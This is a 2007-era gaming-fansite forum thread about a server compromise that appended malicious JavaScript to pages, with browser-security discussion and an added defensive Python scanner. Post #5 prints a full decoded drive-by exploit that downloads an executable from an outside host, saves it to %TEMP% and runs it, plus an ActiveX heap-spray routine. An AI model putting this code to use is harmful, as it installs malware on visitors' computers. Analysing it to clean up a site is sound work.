
Thread: Site hack

  1. #1

    Site hack

    It appears the servers at my host have been compromised and are appending some javascript code to most files. The code is encrypted and uses IE exploits to try and install some stuff. As far as I'm aware you're safe if you use Firefox or Opera, it should only cause the site to act a little screwy if you're using these browsers. I'm doing what I can to get it sorted out.

    Most webmasters do what they can to keep their servers and sites secure, however problems will always arise so it's up to each user to do their own part for the security of their system. IE causes problems time and time again, a while ago World of Tibia had some banners sneak in with an IE exploit, not long ago Tibianews had shortnews warning of the dangers of IE exploits. If you're going to use IE you're going to have problems, change to something else. The old saying still stands: Friends don't let friends use Internet Explorer.

    I'll fix the search and sort bugs that are reported in this forum after the server hack is sorted out.
    Last edited by Sir Rickard; 25-03-2008 at 14:01.

  2. #2
    Hi Pskonejott. I am not sure if you are aware however there is a thread over on the official tibia.com forums about your site using the exploit. You can find it at thread jump 1529183.

    Anyway in case you don't already know the appended scripts are loading an iframe which connects to a PHP file. The PHP file then sends its own Javascript script to the browser which is then run and decodes a string and writes it to the document. This decoded string would be another script which uses the exploit and such. I haven't yet had the chance to decode it so I'm not sure what it's exactly doing. If you like I could give you the IP address of the server the PHP file is located on and send you a copy of the script it sends.

  3. #3
    It would be great if you could post this on the internal Tutor Board. Not only because tutors usually care for botters and such and use your tools, but also because they could spread the warning.

    Kind regards.

  4. #4
    Well, pskonejott.com is not a supported fansite so it really has no place on the tibia.com forums, I certainly won't discuss it there. The appended script is actually encrypted and uses javascript to decrypt it. It's not tibia related and it's something that you can pick up at any number of other sites, or even any tibia fansites if someone wanted to spread it. It's unfortunate that it's causing problems for pskonejott.com, on the upside more people might change from IE to Firefox :P

  5. #5
    Okay, so everything's encoded and I've been going through decoding it to figure out what it does. The first file it loads is http://hard-tsunami.info/lerring/in.php?adv=7 I didn't bother to reverse engineer the algorithm it uses, I just had it document.write encode(u) rather than u and then used http://scriptasylum.com/tutorials/en...de-decode.html Following is what it decodes to, I can't follow the code but maybe someone can shed some light on exactly what it's trying to do. I didn't bother to go on and decode http://hard-tsunami.info/lerring/funny.php?adv=7

    <SCRIPT language="javascript">
    // Second stage as decoded. Flow: look for a COM object that hands out
    // WScript.Shell, fetch funny.php?adv=7&spl=rds into %TEMP% and run it;
    // then fall through to the WebViewFolderIcon setSlice path using the
    // &spl=fi URL. The split string literals only exist to hide the object
    // names from signature scanners.
    var url="http://hard-tsunami.info/lerring/funny.php?adv=7";

    var bb1031966172ff = url+'&spl=rds';

    // Try each CreateObject/GetObject signature until one returns an instance of n.
    function CreateO(o, n) {
        var r = null;

        try { eval('r = o.CreateObject(n)') }catch(e){}

        if (! r) {
            try { eval('r = o.CreateObject(n, "")') }catch(e){}
        }

        if (! r) {
            try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
        }

        if (! r) {
            try { eval('r = o.GetObject("", n)') }catch(e){}
        }

        if (! r) {
            try { eval('r = o.GetObject(n, "")') }catch(e){}
        }

        if (! r) {
            try { eval('r = o.GetObject(n)') }catch(e){}
        }

        return(r);
    }

    // Download the binary with XMLHTTP, write it to %TEMP%\rf969229767mm.exe
    // through ADODB.Stream and start it hidden with WScript.Shell.Run.
    function Go(a) {
        var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");
        var o = CreateO(a, "ADO"+"DB.Str"+"eam");
        var e = s.Environment("Process");

        var bb725395455ff = null;
        var bin = e.Item("TEMP")+ "\\" + "rf969229767mm.exe";
        var bb1987268940ff;

        try { bb725395455ff=new XMLHttpRequest(); }
        catch(e) {
            try { bb725395455ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }
            catch(e) {
                bb725395455ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");
            }
        }

        if (! bb725395455ff) return(0);

        bb725395455ff.open("GET", bb1031966172ff, false)
        bb725395455ff.send(null);
        bb1987268940ff = bb725395455ff.responseBody;

        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(bb1987268940ff);
        o.SaveToFile(bin, 2);

        s.Run(bin,0);
    }

    // CLSIDs instantiated in turn; each one is probed for a way to reach WScript.Shell.
    var i = 0;
    var bb989414148ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',
        '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
        '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
        '{0006F033-0000-0000-C000-000000000046}',
        '{0006F03A-0000-0000-C000-000000000046}',
        '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
        '{6414512B-B978-451D-A0D8-FCFDF33E833C}',
        '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
        '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
        '{639F725F-1B2D-4831-A9FD-874847682010}',
        '{BA018599-1DB3-44f9-83B4-461454C84BF8}',
        '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
        '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
        null);

    while (bb989414148ff[i]) {
        var a = null;

        if (bb989414148ff[i].substring(0,1) == '{') {
            a = document.createElement("object");
            a.setAttribute("classid", "clsid:" + bb989414148ff[i].substring(1, bb989414148ff[i].length - 1));
        } else {
            try { a = new ActiveXObject(bb989414148ff[i]); } catch(e){}
        }

        if (a) {
            try {
                var b = CreateO(a, "WSc"+"ript.She"+"ll");
                if (b) {
                    Go(a);
                    //return(0);
                }
            } catch(e){}
        }
        i++;
    }

    // Second path. The download URL is packed two characters per %u escape
    // (second character in the high byte), prefixed with the removed shellcode,
    // copied many times into a large array together with a 0x0c0c filler, and
    // WebViewFolderIcon.setSlice is then called with 0x0c0c0c0c.
    var bb2086792372ff = url+'&spl=fi';
    var AfgsARtg = 0x0c0c0c0c;
    var bb1816082347ff = '';

    for (i = 0; i < bb2086792372ff.length; )
    {
        bb1816082347ff += '%u' + ((i+1<bb2086792372ff.length)?bb2086792372ff.charCodeAt(i+1).toString(16):'00')+bb2086792372ff.charCodeAt(i).toString(16);
        i = i + 2;
    }

    qwerty = unescape("***REMOVED ESCAPED TEXT SINCE FORUMS CAN'T DISPLAY IT***");
    erty = unescape(bb1816082347ff);
    var bb1695778523ff = qwerty+erty;
    var rf1584506540mmize = 0x400000;
    var desrtfgk = bb1695778523ff.length * 2;
    var bb1821299702ffSize = rf1584506540mmize - (desrtfgk+0x38);
    var bb1821299702ff = unescape("ఌఌ");
    bb1821299702ff = getbb1821299702ff(bb1821299702ff,bb1821299702ffSize);
    rf1584506540mm = (AfgsARtg - 0x400000)/rf1584506540mmize;
    memory = new Array();
    for (i=0;i<rf1584506540mm;i++)
    {
        memory[i] = bb1821299702ff + bb1695778523ff;
    }
    var gov = '';
    var s = gov;
    s += 0x7ffffffe;
    for ( i = 0 ; i < 256 ; i++)
    {
        try{
            var g = new ActiveXObject('WebVi'+'ewFol'+gov+'derI'+gov+'con.WebVie'+gov+'wFol'+'derI'+'con.1');
            g.setSlice(s, AfgsARtg, AfgsARtg, AfgsARtg );
        }catch(e){}
    }

    // Grow the filler by doubling until it reaches the requested byte size, then trim.
    function getbb1821299702ff(bb1821299702ff, bb1821299702ffSize)
    {
        while (bb1821299702ff.length*2<bb1821299702ffSize)
        {
            bb1821299702ff += bb1821299702ff;
        }
        bb1821299702ff = bb1821299702ff.substring(0,bb1821299702ffSize/2);
        return bb1821299702ff;
    }
    </script>
    Last edited by Pskonejott; 03-02-2007 at 18:08.

  6. #6
    Steven (Administrator, Belgium, joined Aug 2006)
    Is IE7 more secure than Firefox?

  7. #7
    I'm no Javascript expert, honestly I've hardly ever touched it, though from what I have made out is when the script runs it attempts to create several objects from class IDs and then attempts to connect to the funny.php file via HTTP. When connected the funny.php file will send executable data which the script then saves as an executable file in the environment's (Windows probably) temporary folder and then proceeds to run it.

    After saving and running the executable I am not exactly sure what it's doing, all I know is it is creating ActiveX objects and then calling some function in them.

    As I said though I'm not a Javascript expert, but I do have a lot of knowledge with other programming languages to know some of what is happening.

  8. #8
    Quote Originally Posted by Fox Mc Cloud:
    Is IE7 more secure than Firefox?
    No, Firefox is more secure than any kind of IE

  9. #9
    I accessed your site now and had no freeze like before (which was the only noticeable effect of the virus using Firefox). Is it fixed already? Note that it didn't even try to access hard-tsunami.com this time.

  10. #10
    Yes, the problem has been solved. It was a cpanel exploit that injects code into mod_layout that is loaded by default with apache. cpanel is an extremely popular server frontend and there are a large number of sites having this problem so you're probably going to see this code on other sites too. I'll try and find out exactly what the code tries to do on your PC.
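An added example, not from the thread and not cPanel's or Apache's code: a small Python scanner for the symptom described in this thread, a script or iframe block bolted onto the end of served pages that pulls content from a host the site never used. `ALLOWED_HOSTS`, the file extensions and the two sample pages are assumptions made for the example.

```python
"""Scan web files for appended off-site <script>/<iframe> injections.

Added example for the thread; the allowed-host list and sample pages are
constructed assumptions, edit them for a real site.
"""
import re
from pathlib import Path

# Hosts the site's own pages legitimately load scripts or frames from (assumed).
ALLOWED_HOSTS = {'www.example.org', 'example.org'}

TAG_RE = re.compile(r'<(script|iframe)\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
HOST_RE = re.compile(r'^(?:https?:)?//([^/:?#]+)', re.I)
END_RE = re.compile(r'</html>', re.I)
INJECT_TAG_RE = re.compile(r'<(script|iframe)\b', re.I)


def external_refs(html: str):
    """Yield (tag, src, host) for every script/iframe src that points off-site."""
    for m in TAG_RE.finditer(html):
        tag, src = m.group(1).lower(), m.group(2)
        h = HOST_RE.match(src)
        if h and h.group(1).lower() not in ALLOWED_HOSTS:
            yield tag, src, h.group(1).lower()


def trailing_markup(html: str) -> bool:
    """True when a script/iframe tag appears after the last </html>: the
    tell-tale of something appended to an otherwise complete page."""
    ends = list(END_RE.finditer(html))
    if not ends:
        return False
    return INJECT_TAG_RE.search(html[ends[-1].end():]) is not None


def scan_text(html: str) -> list:
    """Return human-readable findings for one page's content (empty if clean)."""
    findings = [f'{tag} src points off-site: {src}' for tag, src, _ in external_refs(html)]
    if trailing_markup(html):
        findings.append('script/iframe appended after </html>')
    return findings


def scan_tree(root, exts=('.html', '.htm', '.php')) -> dict:
    """Walk a document root and map each suspicious file path to its findings."""
    results = {}
    for p in Path(root).rglob('*'):
        if p.is_file() and p.suffix.lower() in exts:
            try:
                findings = scan_text(p.read_text(errors='replace'))
            except OSError:
                continue
            if findings:
                results[str(p)] = findings
    return results


# Constructed sample: a clean page, and the same page with a hidden iframe
# appended after </html>. The host name is a placeholder, not a real server.
CLEAN_PAGE = ('<html><head><script src="/js/site.js"></script></head>\n'
              '<body>hello</body></html>')
INFECTED_PAGE = CLEAN_PAGE + (
    '\n<iframe src="http://bad-host.invalid/in.php?adv=7" width=1 height=1></iframe>')

if __name__ == '__main__':
    print('clean   :', scan_text(CLEAN_PAGE))
    print('infected:', scan_text(INFECTED_PAGE))
```

Point `scan_tree()` at the document root from a cron job or after any control-panel update; the check is cheap, and a finding on many files at once is the pattern this thread describes, since the injection came from the server side rather than from one edited page.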

  11. #11
    Okay, well the best I can do is to tell you that it's using the 0day IE exploit that's been known for 9 months and is still unpatched by Microsoft. If you use any other browser you should be safe. As for exactly what it was trying to run, I don't use IE so I have no idea and I haven't been able to track down any info. But it's a remote code execution exploit so they can do anything they want to.

    You're going to run into IE exploits time and time again, guys do yourself a favour and use a different browser. It's extremely difficult to keep a web server secure, even cpanel did not know about this exploit so it means there's lots of other sites around experiencing the same problem.

  12. #12
    Ryshu (Rookie, Canada, joined Dec 2006)
    Well it looks like I'm going back to Firefox again >.> I really liked IE 7.

    But I'm just curious: how seriously will this F up my computer? Cus I go to your site a lot, so I definitely got this gay thing.

  13. #13
    Wayan (Newcomer, Bali, joined Oct 2006)
    phew~ used to go to Psk's a lot a while back, but since I haven't been playing much I haven't bothered seeing how much time I've spent online, lol

    anyhow, hope that the problem is solved, and that no one got any damage from going to the website.

    safest thing would be to format c: I would imagine. but that's just a pain in the ass... unless you find your acc cleaned out >.<

    but it might have nothing to do with tibia, and be after something else eg. c-card, or personal info.. either way, it can't be something good :S

    gl at figuring out what the code is trying to do, and if it's of any great danger to tibia, or anything else...

    w.

  14. #14
    Moises Del'Vodka (Rookie, Cochabamba, Bolivia, joined Feb 2007)
    Quote Originally Posted by Tawen:
    No, Firefox is more secure than any kind of IE
    Totally agreed... always use Firefox.

  15. #15
    Caelholdt (Addict, Stockholm, Sweden, joined Jan 2007)
    Firefox is not MORE secure, thinking that would be false. It's getting more and more dangerous to use Firefox by the day, better switch to another browser

    Reality is an illusion

  16. #16
    Quote Originally Posted by Caelholdt:
    Firefox is not MORE secure, thinking that would be false. It's getting more and more dangerous to use Firefox by the day, better switch to another browser
    Thinking IE is more secure than Firefox would be false. The fact is there are far fewer known security vulnerabilities in Firefox, add to this the fact that once found and reported they are likely to be fixed as soon as possible (depending on how severe the vulnerability is). IE on the other hand has more known vulnerabilities, some of which do not get patched for months after being discovered (such as the exploit Pskonejott stated in this thread). Also due to Firefox's open-source nature where anyone can gain access to the source code, bugs are much easier to find, report and then ultimately fix, the same cannot be said about IE which is a closed-source piece of software.

    I disagree that Firefox is getting more dangerous to use, sure bugs may be found but they are also being fixed shortly after. I see no reason why people should switch to using another browser as you suggested, Firefox simply put is one of, if not the, safest there is right now.

  17. #17
    Humm... my friend got hacked because of your site, but it's not your fault ;D

    @Cuisdy:Now that darconian got deleted the S.o.S will win the war

  18. #18
    eatfoo (Addict, Perth, Australia, joined Aug 2006)
    this is a big HA! to everyone on this forum who has been going on the campaign trail for IE. please listen to the smart man.

    CHANGE TO FIREFOX

    www.firefox.com.
    in addition to being more secure it runs faster and you can use these cool Greasemonkey scripts.

  19. #19
    Dragonslayer (Tibiacity staff, Idaho, USA, joined Nov 2006)
    I use a COMPAQ model - probably around 2002 model with IE 5.5 (I think) on it. Can I download Firefox from any site? or is it a hardware pay lots of money for item?
    "For in the end, we will conserve only what we love, we will love only what we understand, we will understand only what we are taught." - Baba Dioum

    "Freedom is never more than one generation away from extinction" - Ronald Reagan

  20. #20
    eatfoo (Addict, Perth, Australia, joined Aug 2006)
    Firefox is free

    www.firefox.com
